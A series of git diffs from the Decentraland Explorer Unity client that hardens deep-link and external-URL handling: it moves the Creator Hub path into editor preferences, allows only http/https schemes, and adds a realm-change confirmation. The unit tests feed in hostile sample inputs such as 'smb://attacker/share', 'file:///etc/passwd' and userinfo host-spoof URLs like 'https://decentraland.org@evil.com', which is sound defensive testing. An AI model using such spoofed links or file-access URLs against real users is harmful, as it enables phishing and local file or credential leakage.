             SerializedProperty appParameters = property.FindPropertyRelative("appParameters");
             bool cdpEnabled = HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
+            string? currentCreatorHubPath = GetFlagValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
 
             // CDP section: header + status + toggle
             int lineCount = 3;
@@ -139,8 +139,8 @@ namespace Global.Editor
             {
                 lineCount += 1;
 
-                // "Use Default Path" button (only when an override is set)
-                if (!string.IsNullOrEmpty(EditorPrefs.GetString(CreatorHubBrowser.BIN_PATH_EDITOR_PREF_KEY, string.Empty)))
+                // Clear button (if custom path is set)
+                if (!string.IsNullOrEmpty(currentCreatorHubPath))
                     lineCount += 1;
             }
 
@@ -261,7 +261,20 @@ namespace Global.Editor
             return false;
         }
 
-        private static void EnableCdpDevTools(SerializedProperty appParameters)
+        private static string? GetFlagValue(SerializedProperty appParameters, string flag)
+        {
+            string formattedFlag = FormatFlag(flag);
+
+            for (int i = 0; i < appParameters.arraySize; i++)
+            {
+                if (appParameters.GetArrayElementAtIndex(i).stringValue == formattedFlag && i + 1 < appParameters.arraySize)
+                    return appParameters.GetArrayElementAtIndex(i + 1).stringValue;
+            }
+
+            return null;
+        }
+
+        private static void EnableCdpDevTools(SerializedProperty appParameters, string? creatorHubPath)
         {
             if (!HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START))
             {
@@ -276,16 +289,63 @@ namespace Global.Editor
                 appParameters.GetArrayElementAtIndex(insertIndex + 1).stringValue = "true";
             }
 
+            // Add Creator Hub path if found
+            if (!string.IsNullOrEmpty(creatorHubPath))
+                SetCreatorHubPath(appParameters, creatorHubPath);
+
             appParameters.serializedObject.ApplyModifiedProperties();
         }
 
         private static void DisableCdpDevTools(SerializedProperty appParameters)
         {
             RemoveFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
+            RemoveFlag(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
+            appParameters.serializedObject.ApplyModifiedProperties();
+        }
+
+        private static void SetCreatorHubPath(SerializedProperty appParameters, string path)
+        {
+            // First remove existing path if any
+            RemoveFlagWithValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
+
+            // Add --flag and value
+            int insertIndex = appParameters.arraySize;
+            appParameters.InsertArrayElementAtIndex(insertIndex);
+            appParameters.GetArrayElementAtIndex(insertIndex).stringValue = FormatFlag(AppArgsFlags.CREATOR_HUB_BIN_PATH);
+
+            appParameters.InsertArrayElementAtIndex(insertIndex + 1);
+            appParameters.GetArrayElementAtIndex(insertIndex + 1).stringValue = path;
+
             appParameters.serializedObject.ApplyModifiedProperties();
         }
 
         private static void RemoveFlag(SerializedProperty appParameters, string flag)
+        {
+            string formattedFlag = FormatFlag(flag);
+
+            for (int i = appParameters.arraySize - 1; i >= 0; i--)
+            {
+                if (appParameters.GetArrayElementAtIndex(i).stringValue == formattedFlag)
+                {
+                    // Remove the value first (if exists)
+                    if (i + 1 < appParameters.arraySize)
+                    {
+                        string nextValue = appParameters.GetArrayElementAtIndex(i + 1).stringValue;
+
+                        // Only remove if it's not another flag
+                        if (!nextValue.StartsWith("--"))
+                            appParameters.DeleteArrayElementAtIndex(i + 1);
+                    }
+
+                    // Then remove the flag
+                    appParameters.DeleteArrayElementAtIndex(i);
+                    appParameters.serializedObject.ApplyModifiedProperties();
+                    return;
+                }
+            }
+        }
+
+        private static void RemoveFlagWithValue(SerializedProperty appParameters, string flag)
         {
             string formattedFlag = FormatFlag(flag);
 

--- a/Explorer/Assets/DCL/Infrastructure/Global/Editor/DebugSettingsDrawer.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Editor/DebugSettingsDrawer.cs
@@ -26,7 +26,6 @@ namespace Global.Editor
             SerializedProperty appParameters = property.FindPropertyRelative("appParameters");
 
             bool cdpEnabled = HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
-            string? currentCreatorHubPath = GetFlagValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
 
             string? detectedCreatorHubPath = FindCreatorHubPath();
             bool creatorHubInstalled = !string.IsNullOrEmpty(detectedCreatorHubPath);
@@ -46,7 +45,7 @@ namespace Global.Editor
             else
             {
                 statusStyle.normal.textColor = new Color(0.9f, 0.5f, 0.1f);
-                EditorGUI.LabelField(position, "Creator Hub not found at default location", statusStyle);
+                EditorGUI.LabelField(position, "Creator Hub not found at default location (you'll be prompted to locate it when DevTools launches)", statusStyle);
             }
 
             position.y += SingleLineHeight;
@@ -58,61 +57,12 @@ namespace Global.Editor
             if (EditorGUI.EndChangeCheck() && newCdpEnabled != cdpEnabled)
             {
                 if (newCdpEnabled)
-                    EnableCdpDevTools(appParameters, detectedCreatorHubPath);
+                    EnableCdpDevTools(appParameters);
                 else
                     DisableCdpDevTools(appParameters);
             }
 
             position.y += SingleLineHeight;
-
-            // Custom Creator Hub path (only if CDP is enabled)
-            if (cdpEnabled)
-            {
-                EditorGUI.BeginChangeCheck();
-
-                Rect pathFieldRect = position;
-                pathFieldRect.width -= 80;
-
-                Rect browseButtonRect = position;
-                browseButtonRect.x = position.xMax - 75;
-                browseButtonRect.width = 75;
-
-                string displayPath = currentCreatorHubPath ?? detectedCreatorHubPath ?? "Not found";
-                string newPath = EditorGUI.TextField(pathFieldRect, new GUIContent("Creator Hub Path"), displayPath);
-
-                if (GUI.Button(browseButtonRect, "Browse"))
-                {
-                    string? initialDir = !string.IsNullOrEmpty(currentCreatorHubPath) ? Path.GetDirectoryName(currentCreatorHubPath) :
-                        !string.IsNullOrEmpty(detectedCreatorHubPath) ? Path.GetDirectoryName(detectedCreatorHubPath) : Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
-
-#if UNITY_EDITOR_WIN
-                    string selectedPath = EditorUtility.OpenFilePanel("Select Creator Hub Executable", initialDir ?? "", "exe");
-#else
-                    string selectedPath = EditorUtility.OpenFilePanel("Select Creator Hub Executable", initialDir ?? "", "");
-#endif
-
-                    if (!string.IsNullOrEmpty(selectedPath))
-                        newPath = selectedPath;
-                }
-
-                if (EditorGUI.EndChangeCheck() && newPath != displayPath)
-                    SetCreatorHubPath(appParameters, newPath);
-
-                position.y += SingleLineHeight;
-
-                // Clear custom path button if a custom path is set
-                if (!string.IsNullOrEmpty(currentCreatorHubPath))
-                {
-                    Rect clearButtonRect = position;
-                    clearButtonRect.x = position.xMax - 150;
-                    clearButtonRect.width = 150;
-
-                    if (GUI.Button(clearButtonRect, "Use Default Path"))
-                        RemoveFlag(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
-
-                    position.y += SingleLineHeight;
-                }
-            }
 
             // Separator
             position.y += 5;
@@ -127,30 +77,13 @@ namespace Global.Editor
 
         public override float GetPropertyHeight(SerializedProperty property, GUIContent label)
         {
-            SerializedProperty appParameters = property.FindPropertyRelative("appParameters");
-            bool cdpEnabled = HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
-            string? currentCreatorHubPath = GetFlagValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
-
-            // CDP section: header + status + toggle
-            int lineCount = 3;
-
-            // Custom path field (if CDP enabled)
-            if (cdpEnabled)
-            {
-                lineCount += 1;
-
-                // Clear button (if custom path is set)
-                if (!string.IsNullOrEmpty(currentCreatorHubPath))
-                    lineCount += 1;
-            }
-
-            // Separator
-            lineCount += 1;
+            // CDP section (header + status + toggle) + separator.
+            const int LINE_COUNT = 4;
 
             // Default properties (including appParameters as raw array)
             float defaultPropertiesHeight = GetDefaultPropertiesHeight(property);
 
-            return (lineCount * SingleLineHeight) + 5 + defaultPropertiesHeight;
+            return (LINE_COUNT * SingleLineHeight) + 5 + defaultPropertiesHeight;
         }
 
         private static Rect DrawDefaultProperties(Rect position, SerializedProperty property)
@@ -261,20 +194,7 @@ namespace Global.Editor
             return false;
         }
 
-        private static string? GetFlagValue(SerializedProperty appParameters, string flag)
-        {
-            string formattedFlag = FormatFlag(flag);
-
-            for (int i = 0; i < appParameters.arraySize; i++)
-            {
-                if (appParameters.GetArrayElementAtIndex(i).stringValue == formattedFlag && i + 1 < appParameters.arraySize)
-                    return appParameters.GetArrayElementAtIndex(i + 1).stringValue;
-            }
-
-            return null;
-        }
-
-        private static void EnableCdpDevTools(SerializedProperty appParameters, string? creatorHubPath)
+        private static void EnableCdpDevTools(SerializedProperty appParameters)
         {
             if (!HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START))
             {
@@ -289,63 +209,16 @@ namespace Global.Editor
                 appParameters.GetArrayElementAtIndex(insertIndex + 1).stringValue = "true";
             }
 
-            // Add Creator Hub path if found
-            if (!string.IsNullOrEmpty(creatorHubPath))
-                SetCreatorHubPath(appParameters, creatorHubPath);
-
             appParameters.serializedObject.ApplyModifiedProperties();
         }
 
         private static void DisableCdpDevTools(SerializedProperty appParameters)
         {
             RemoveFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
-            RemoveFlag(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
-            appParameters.serializedObject.ApplyModifiedProperties();
-        }
-
-        private static void SetCreatorHubPath(SerializedProperty appParameters, string path)
-        {
-            // First remove existing path if any
-            RemoveFlagWithValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
-
-            // Add --flag and value
-            int insertIndex = appParameters.arraySize;
-            appParameters.InsertArrayElementAtIndex(insertIndex);
-            appParameters.GetArrayElementAtIndex(insertIndex).stringValue = FormatFlag(AppArgsFlags.CREATOR_HUB_BIN_PATH);
-
-            appParameters.InsertArrayElementAtIndex(insertIndex + 1);
-            appParameters.GetArrayElementAtIndex(insertIndex + 1).stringValue = path;
-
             appParameters.serializedObject.ApplyModifiedProperties();
         }
 
         private static void RemoveFlag(SerializedProperty appParameters, string flag)
-        {
-            string formattedFlag = FormatFlag(flag);
-
-            for (int i = appParameters.arraySize - 1; i >= 0; i--)
-            {
-                if (appParameters.GetArrayElementAtIndex(i).stringValue == formattedFlag)
-                {
-                    // Remove the value first (if exists)
-                    if (i + 1 < appParameters.arraySize)
-                    {
-                        string nextValue = appParameters.GetArrayElementAtIndex(i + 1).stringValue;
-
-                        // Only remove if it's not another flag
-                        if (!nextValue.StartsWith("--"))
-                            appParameters.DeleteArrayElementAtIndex(i + 1);
-                    }
-
-                    // Then remove the flag
-                    appParameters.DeleteArrayElementAtIndex(i);
-                    appParameters.serializedObject.ApplyModifiedProperties();
-                    return;
-                }
-            }
-        }
-
-        private static void RemoveFlagWithValue(SerializedProperty appParameters, string flag)
         {
             string formattedFlag = FormatFlag(flag);
 

--- a/Explorer/Assets/DCL/Infrastructure/Global/Editor/DebugSettingsDrawer.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Editor/DebugSettingsDrawer.cs
@@ -26,9 +26,8 @@ namespace Global.Editor
             SerializedProperty appParameters = property.FindPropertyRelative("appParameters");
 
             bool cdpEnabled = HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
-            string? currentCreatorHubPath = GetFlagValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
 
-            string detectedCreatorHubPath = FindCreatorHubPath();
+            string? detectedCreatorHubPath = FindCreatorHubPath();
             bool creatorHubInstalled = !string.IsNullOrEmpty(detectedCreatorHubPath);
 
             // CDP DevTools Section
@@ -58,16 +57,18 @@ namespace Global.Editor
             if (EditorGUI.EndChangeCheck() && newCdpEnabled != cdpEnabled)
             {
                 if (newCdpEnabled)
-                    EnableCdpDevTools(appParameters, detectedCreatorHubPath);
+                    EnableCdpDevTools(appParameters);
                 else
                     DisableCdpDevTools(appParameters);
             }
 
             position.y += SingleLineHeight;
 
-            // Custom Creator Hub path (only if CDP is enabled)
+            // Custom Creator Hub path — developer-local override stored in EditorPrefs, never an app-arg / deep link (SEC-005).
             if (cdpEnabled)
             {
+                string currentOverride = EditorPrefs.GetString(CreatorHubBrowser.BIN_PATH_EDITOR_PREF_KEY, string.Empty);
+
                 EditorGUI.BeginChangeCheck();
 
                 Rect pathFieldRect = position;
@@ -77,12 +78,12 @@ namespace Global.Editor
                 browseButtonRect.x = position.xMax - 75;
                 browseButtonRect.width = 75;
 
-                string displayPath = currentCreatorHubPath ?? detectedCreatorHubPath ?? "Not found";
-                string newPath = EditorGUI.TextField(pathFieldRect, new GUIContent("Creator Hub Path"), displayPath);
+                string displayPath = !string.IsNullOrEmpty(currentOverride) ? currentOverride : detectedCreatorHubPath ?? "Not found";
+                string newPath = EditorGUI.TextField(pathFieldRect, new GUIContent("Creator Hub Path", "Editor-only override for the Creator Hub executable. Leave empty to use the default install path."), displayPath);
 
                 if (GUI.Button(browseButtonRect, "Browse"))
                 {
-                    string initialDir = !string.IsNullOrEmpty(currentCreatorHubPath) ? Path.GetDirectoryName(currentCreatorHubPath) :
+                    string? initialDir = !string.IsNullOrEmpty(currentOverride) ? Path.GetDirectoryName(currentOverride) :
                         !string.IsNullOrEmpty(detectedCreatorHubPath) ? Path.GetDirectoryName(detectedCreatorHubPath) : Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
 
 #if UNITY_EDITOR_WIN
@@ -96,19 +97,19 @@ namespace Global.Editor
                 }
 
                 if (EditorGUI.EndChangeCheck() && newPath != displayPath)
-                    SetCreatorHubPath(appParameters, newPath);
+                    EditorPrefs.SetString(CreatorHubBrowser.BIN_PATH_EDITOR_PREF_KEY, newPath);
 
                 position.y += SingleLineHeight;
 
-                // Clear custom path button if a custom path is set
-                if (!string.IsNullOrEmpty(currentCreatorHubPath))
+                // "Use Default Path" clears the override so the pinned default path is used.
+                if (!string.IsNullOrEmpty(currentOverride))
                 {
                     Rect clearButtonRect = position;
                     clearButtonRect.x = position.xMax - 150;
                     clearButtonRect.width = 150;
 
                     if (GUI.Button(clearButtonRect, "Use Default Path"))
-                        RemoveFlag(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
+                        EditorPrefs.DeleteKey(CreatorHubBrowser.BIN_PATH_EDITOR_PREF_KEY);
 
                     position.y += SingleLineHeight;
                 }
@@ -129,7 +130,6 @@ namespace Global.Editor
         {
             SerializedProperty appParameters = property.FindPropertyRelative("appParameters");
             bool cdpEnabled = HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
-            string? currentCreatorHubPath = GetFlagValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
 
             // CDP section: header + status + toggle
             int lineCount = 3;
@@ -139,8 +139,8 @@ namespace Global.Editor
             {
                 lineCount += 1;
 
-                // Clear button (if custom path is set)
-                if (!string.IsNullOrEmpty(currentCreatorHubPath))
+                // "Use Default Path" button (only when an override is set)
+                if (!string.IsNullOrEmpty(EditorPrefs.GetString(CreatorHubBrowser.BIN_PATH_EDITOR_PREF_KEY, string.Empty)))
                     lineCount += 1;
             }
 
@@ -261,20 +261,7 @@ namespace Global.Editor
             return false;
         }
 
-        private static string? GetFlagValue(SerializedProperty appParameters, string flag)
-        {
-            string formattedFlag = FormatFlag(flag);
-
-            for (int i = 0; i < appParameters.arraySize; i++)
-            {
-                if (appParameters.GetArrayElementAtIndex(i).stringValue == formattedFlag && i + 1 < appParameters.arraySize)
-                    return appParameters.GetArrayElementAtIndex(i + 1).stringValue;
-            }
-
-            return null;
-        }
-
-        private static void EnableCdpDevTools(SerializedProperty appParameters, string? creatorHubPath)
+        private static void EnableCdpDevTools(SerializedProperty appParameters)
         {
             if (!HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START))
             {
@@ -289,63 +276,16 @@ namespace Global.Editor
                 appParameters.GetArrayElementAtIndex(insertIndex + 1).stringValue = "true";
             }
 
-            // Add Creator Hub path if found
-            if (!string.IsNullOrEmpty(creatorHubPath))
-                SetCreatorHubPath(appParameters, creatorHubPath);
-
             appParameters.serializedObject.ApplyModifiedProperties();
         }
 
         private static void DisableCdpDevTools(SerializedProperty appParameters)
         {
             RemoveFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
-            RemoveFlag(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
-            appParameters.serializedObject.ApplyModifiedProperties();
-        }
-
-        private static void SetCreatorHubPath(SerializedProperty appParameters, string path)
-        {
-            // First remove existing path if any
-            RemoveFlagWithValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
-
-            // Add --flag and value
-            int insertIndex = appParameters.arraySize;
-            appParameters.InsertArrayElementAtIndex(insertIndex);
-            appParameters.GetArrayElementAtIndex(insertIndex).stringValue = FormatFlag(AppArgsFlags.CREATOR_HUB_BIN_PATH);
-
-            appParameters.InsertArrayElementAtIndex(insertIndex + 1);
-            appParameters.GetArrayElementAtIndex(insertIndex + 1).stringValue = path;
-
             appParameters.serializedObject.ApplyModifiedProperties();
         }
 
         private static void RemoveFlag(SerializedProperty appParameters, string flag)
-        {
-            string formattedFlag = FormatFlag(flag);
-
-            for (int i = appParameters.arraySize - 1; i >= 0; i--)
-            {
-                if (appParameters.GetArrayElementAtIndex(i).stringValue == formattedFlag)
-                {
-                    // Remove the value first (if exists)
-                    if (i + 1 < appParameters.arraySize)
-                    {
-                        string nextValue = appParameters.GetArrayElementAtIndex(i + 1).stringValue;
-
-                        // Only remove if it's not another flag
-                        if (!nextValue.StartsWith("--"))
-                            appParameters.DeleteArrayElementAtIndex(i + 1);
-                    }
-
-                    // Then remove the flag
-                    appParameters.DeleteArrayElementAtIndex(i);
-                    appParameters.serializedObject.ApplyModifiedProperties();
-                    return;
-                }
-            }
-        }
-
-        private static void RemoveFlagWithValue(SerializedProperty appParameters, string flag)
         {
             string formattedFlag = FormatFlag(flag);
 

--- a/Explorer/Assets/DCL/NetworkDefinitions/Browser/ExternalUrlPolicy.cs
+++ b/Explorer/Assets/DCL/NetworkDefinitions/Browser/ExternalUrlPolicy.cs
@@ -1,0 +1,35 @@
+using System;
+
+namespace DCL.Browser
+{
+    /// <summary>
+    /// Central policy for opening external URLs: only http/https reach the OS handler. Custom schemes
+    /// (decentraland://, smb://, file://, mailto:, app-protocol handlers) are refused so a scene/profile
+    /// link can never re-invoke the launcher (SEC-028) or leak NTLM/local files (SEC-008).
+    /// </summary>
+    public static class ExternalUrlPolicy
+    {
+        /// <summary>
+        /// True if the URL is an absolute http/https web URL. Validates the scheme by prefix and does NOT
+        /// allocate a <see cref="Uri"/> (callers that already hold a parsed Uri use it directly instead).
+        /// This is the single http/https predicate shared across the client — external-URL sink, realm
+        /// resolution, and realm launch settings all route through it.
+        /// </summary>
+        public static bool IsWebScheme(string? url) =>
+            !string.IsNullOrEmpty(url)
+            && (url.StartsWith("https://", StringComparison.OrdinalIgnoreCase)
+                || url.StartsWith("http://", StringComparison.OrdinalIgnoreCase));
+
+        /// <summary>Trust-cache key on (scheme, host). Returns false for authority-less URIs (empty host),
+        /// which must never be cached (SEC-008 empty-host bypass).</summary>
+        public static bool TryGetTrustKey(Uri uri, out string key)
+        {
+            key = string.Empty;
+            if (string.IsNullOrEmpty(uri.Host))
+                return false;
+
+            key = $"{uri.Scheme}|{uri.Host}";
+            return true;
+        }
+    }
+}

--- a/Explorer/Assets/DCL/NetworkDefinitions/Browser/ExternalUrlPolicy.cs.meta
+++ b/Explorer/Assets/DCL/NetworkDefinitions/Browser/ExternalUrlPolicy.cs.meta
@@ -1,0 +1,11 @@
+fileFormatVersion: 2
+guid: 257d886dfa7b423297aeb6210b9ba95e
+MonoImporter:
+  externalObjects: {}
+  serializedVersion: 2
+  defaultReferences: []
+  executionOrder: 0
+  icon: {instanceID: 0}
+  userData:
+  assetBundleName:
+  assetBundleVariant:

--- a/Explorer/Assets/DCL/NetworkDefinitions/Browser/Tests/ExternalUrlPolicyShould.cs
+++ b/Explorer/Assets/DCL/NetworkDefinitions/Browser/Tests/ExternalUrlPolicyShould.cs
@@ -1,0 +1,33 @@
+using NUnit.Framework;
+using System;
+
+namespace DCL.Browser
+{
+    public class ExternalUrlPolicyShould
+    {
+        [TestCase("https://decentraland.org", true)]
+        [TestCase("http://example.com", true)]
+        [TestCase("smb://attacker/share", false)]
+        [TestCase("file:///etc/passwd", false)]
+        [TestCase("decentraland://?creator-hub-bin-path=x", false)]
+        [TestCase("mailto:a@b.com", false)]
+        [TestCase("steam://run/1", false)]
+        [TestCase("not a url", false)]
+        public void ClassifyScheme(string url, bool expected) =>
+            Assert.AreEqual(expected, ExternalUrlPolicy.IsWebScheme(url));
+
+        [Test]
+        public void RefuseEmptyHostTrustKey()
+        {
+            var fileUri = new Uri("file:///x");
+            Assert.IsFalse(ExternalUrlPolicy.TryGetTrustKey(fileUri, out _), "empty-host URIs must never be cacheable");
+        }
+
+        [Test]
+        public void TrustKeyIsSchemeAndHost()
+        {
+            Assert.IsTrue(ExternalUrlPolicy.TryGetTrustKey(new Uri("https://decentraland.org/x"), out string key));
+            Assert.AreEqual("https|decentraland.org", key);
+        }
+    }
+}

--- a/Explorer/Assets/DCL/NetworkDefinitions/Browser/Tests/ExternalUrlPolicyShould.cs.meta
+++ b/Explorer/Assets/DCL/NetworkDefinitions/Browser/Tests/ExternalUrlPolicyShould.cs.meta
@@ -1,0 +1,11 @@
+fileFormatVersion: 2
+guid: 010396ed4c3e4c40bcf607597fafae41
+MonoImporter:
+  externalObjects: {}
+  serializedVersion: 2
+  defaultReferences: []
+  executionOrder: 0
+  icon: {instanceID: 0}
+  userData:
+  assetBundleName:
+  assetBundleVariant:

--- a/Explorer/Assets/DCL/NetworkDefinitions/Browser/UnityAppWebBrowser.cs
+++ b/Explorer/Assets/DCL/NetworkDefinitions/Browser/UnityAppWebBrowser.cs
@@ -1,3 +1,4 @@
+using DCL.Diagnostics;
 using DCL.Multiplayer.Connections.DecentralandUrls;
 using System;
 using UnityEngine;
@@ -16,6 +17,12 @@ namespace DCL.Browser
 
         public virtual void OpenUrlMainThreadOnly(string url)
         {
+            if (!ExternalUrlPolicy.IsWebScheme(url))
+            {
+                ReportHub.LogWarning(ReportCategory.UI, "Refused to open non-web URL scheme");
+                return;
+            }
+
             Application.OpenURL(Uri.EscapeUriString(url));
         }
 

--- a/Explorer/Assets/DCL/NetworkDefinitions/DCL.Network.asmdef
+++ b/Explorer/Assets/DCL/NetworkDefinitions/DCL.Network.asmdef
@@ -12,7 +12,8 @@
         "GUID:1087662aaf1c5462baa91fb9484296fd",
         "GUID:e0cd26848372d4e5c891c569017e11f1",
         "GUID:13c468c9ecfc44f249fb8fb69d3365ef",
-        "GUID:d8b63aba1907145bea998dd612889d6b"
+        "GUID:d8b63aba1907145bea998dd612889d6b",
+        "GUID:3acaaf1301d842f498099c27ba260121"
     ],
     "includePlatforms": [],
     "excludePlatforms": [],

--- a/Explorer/Assets/DCL/PluginSystem/Global/ChangeRealmPromptPlugin.cs
+++ b/Explorer/Assets/DCL/PluginSystem/Global/ChangeRealmPromptPlugin.cs
@@ -55,7 +55,7 @@ namespace DCL.PluginSystem.Global
             [field: Header(nameof(ChangeRealmPromptPlugin) + "." + nameof(ChangeRealmPromptSettings))]
             [field: Space]
             [field: SerializeField]
-            public AssetReferenceGameObject ChangeRealmPromptPrefab;
+            public AssetReferenceGameObject ChangeRealmPromptPrefab = null!;
         }
     }
 }

--- a/Explorer/Assets/DCL/PluginSystem/Global/ChangeRealmPromptPlugin.cs
+++ b/Explorer/Assets/DCL/PluginSystem/Global/ChangeRealmPromptPlugin.cs
@@ -16,14 +16,14 @@ namespace DCL.PluginSystem.Global
         private readonly IAssetsProvisioner assetsProvisioner;
         private readonly IMVCManager mvcManager;
         private readonly ICursor cursor;
-        private readonly Action<string> changeRealmCallback;
+        private readonly Action<string, Vector2Int?> changeRealmCallback;
         private ChangeRealmPromptController? changeRealmPromptController;
 
         public ChangeRealmPromptPlugin(
             IAssetsProvisioner assetsProvisioner,
             IMVCManager mvcManager,
             ICursor cursor,
-            Action<string> changeRealmCallback)
+            Action<string, Vector2Int?> changeRealmCallback)
         {
             this.assetsProvisioner = assetsProvisioner;
             this.mvcManager = mvcManager;

--- a/Explorer/Assets/DCL/Prefs/DCLPrefKeys.cs
+++ b/Explorer/Assets/DCL/Prefs/DCLPrefKeys.cs
@@ -6,6 +6,10 @@ namespace DCL.Prefs
 
         public const string LAUNCH_COUNT = "LaunchCount";
 
+        // Developer-selected path to the Creator Hub executable, remembered across launches so the Chrome
+        // DevTools bridge can relaunch it without re-prompting. Not an app-arg / deep-link input (SEC-005).
+        public const string CREATOR_HUB_BIN_PATH = "CreatorHub.BinPath";
+
         public const string PREVIOUS_SEARCHES = "previous_searches";
 
         public const string WEB3_IDENTITY = "Web3Authentication.Identity";

--- a/Explorer/Assets/DCL/RuntimeDeepLink/DeepLinkHandleImplementation.cs
+++ b/Explorer/Assets/DCL/RuntimeDeepLink/DeepLinkHandleImplementation.cs
@@ -1,5 +1,6 @@
 using CommunicationData.URLHelpers;
 using Cysharp.Threading.Tasks;
+using DCL.ChangeRealmPrompt;
 using DCL.Chat.Commands;
 using DCL.Communities;
 using DCL.ExplorePanel;
@@ -71,11 +72,7 @@ namespace DCL.RuntimeDeepLink
 
             if (realm.HasValue)
             {
-                if(position.HasValue)
-                    chatTeleporter.TeleportToRealmAsync(realm.Value.Value, position.Value, token).Forget();
-                else
-                    chatTeleporter.TeleportToRealmAsync(realm.Value.Value, token).Forget();
-
+                ShowRealmChangePromptAsync(realm.Value.Value, position).Forget();
                 handled = true;
             }
             else if (position.HasValue)
@@ -103,6 +100,21 @@ namespace DCL.RuntimeDeepLink
             }
 
             return handled ? DeepLinkHandleResult.CONSUMED : DeepLinkHandleResult.NO_MATCHES;
+        }
+
+        private async UniTaskVoid ShowRealmChangePromptAsync(string realm, Vector2Int? position)
+        {
+            // Empty message → the prompt renders the default confirmation text and requires an explicit click (SEC-003).
+            if (token.IsCancellationRequested)
+                return;
+
+            await UniTask.SwitchToMainThread();
+
+            ChangeRealmPromptController.Params parameters = position.HasValue
+                ? new ChangeRealmPromptController.Params(string.Empty, realm, position.Value)
+                : new ChangeRealmPromptController.Params(string.Empty, realm);
+
+            await mvcManager.ShowAsync(ChangeRealmPromptController.IssueCommand(parameters));
         }
 
         private static URLDomain? RealmFrom(DeepLink deepLink)

--- a/Explorer/Assets/DCL/RuntimeDeepLink/DeepLinkHandleImplementation.cs
+++ b/Explorer/Assets/DCL/RuntimeDeepLink/DeepLinkHandleImplementation.cs
@@ -108,13 +108,11 @@ namespace DCL.RuntimeDeepLink
             if (token.IsCancellationRequested)
                 return;
 
-            await UniTask.SwitchToMainThread();
+            await UniTask.SwitchToMainThread(token);
 
-            ChangeRealmPromptController.Params parameters = position.HasValue
-                ? new ChangeRealmPromptController.Params(string.Empty, realm, position.Value)
-                : new ChangeRealmPromptController.Params(string.Empty, realm);
+            var parameters = new ChangeRealmPromptController.Params(string.Empty, realm, position);
 
-            await mvcManager.ShowAsync(ChangeRealmPromptController.IssueCommand(parameters));
+            await mvcManager.ShowAsync(ChangeRealmPromptController.IssueCommand(parameters), token);
         }
 
         private static URLDomain? RealmFrom(DeepLink deepLink)

--- a/Explorer/Assets/DCL/Tests/Editor/ChangeRealmPromptDestinationHostShould.cs
+++ b/Explorer/Assets/DCL/Tests/Editor/ChangeRealmPromptDestinationHostShould.cs
@@ -1,0 +1,20 @@
+using DCL.ChangeRealmPrompt;
+using NUnit.Framework;
+
+namespace DCL.Tests.Editor
+{
+    public class ChangeRealmPromptDestinationHostShould
+    {
+        [TestCase("https://evil.com/path", "evil.com")]
+        [TestCase("https://evil.com:8080/path", "evil.com:8080")]        // port kept in the displayed authority
+        [TestCase("https://decentraland.org@evil.com", "evil.com")]       // userinfo stripped — real host shown
+        [TestCase("https://user:pass@evil.com:443/x", "evil.com:443")]    // userinfo + port
+        [TestCase("world-name", "world-name")]                            // no scheme → shown unchanged
+        [TestCase("https://host?q=1", "host")]                            // query stripped
+        [TestCase("https://host#frag", "host")]                           // fragment stripped
+        public void ExtractsTrueHostForDisplay(string realm, string expected)
+        {
+            Assert.AreEqual(expected, ChangeRealmPromptController.DestinationHostFor(realm), realm);
+        }
+    }
+}

--- a/Explorer/Assets/DCL/Tests/Editor/ChangeRealmPromptDestinationHostShould.cs.meta
+++ b/Explorer/Assets/DCL/Tests/Editor/ChangeRealmPromptDestinationHostShould.cs.meta
@@ -1,0 +1,2 @@
+fileFormatVersion: 2
+guid: 6937ae263a04c1b4486661b8361d27bf

--- a/Explorer/Assets/DCL/Tests/Editor/ChatEnvironmentValidatorShould.cs
+++ b/Explorer/Assets/DCL/Tests/Editor/ChatEnvironmentValidatorShould.cs
@@ -11,6 +11,9 @@ namespace DCL.Tests.Editor
         [TestCase("https://evil.example/org", false)]              // substring "org" no longer passes
         [TestCase("https://decentraland.org.attacker.com", false)] // suffix-spoof
         [TestCase("https://attacker-decentraland.org", false)]     // not a real subdomain boundary
+        [TestCase("https://decentraland.org@evil.com", false)]      // userinfo spoof — real host is evil.com
+        [TestCase("https://decentraland.org:1234@evil.com", false)] // colon-before-@ userinfo spoof (real host evil.com)
+        [TestCase("https://peer.decentraland.org:443", true)]       // legit host with an explicit port
         public void ValidateOrgBySuffix(string realm, bool expectSuccess)
         {
             var validator = new ChatEnvironmentValidator(DecentralandEnvironment.Org);

--- a/Explorer/Assets/DCL/Tests/Editor/ChatEnvironmentValidatorShould.cs
+++ b/Explorer/Assets/DCL/Tests/Editor/ChatEnvironmentValidatorShould.cs
@@ -1,0 +1,28 @@
+using DCL.Chat.Commands;
+using DCL.Multiplayer.Connections.DecentralandUrls;
+using NUnit.Framework;
+
+namespace DCL.Tests.Editor
+{
+    public class ChatEnvironmentValidatorShould
+    {
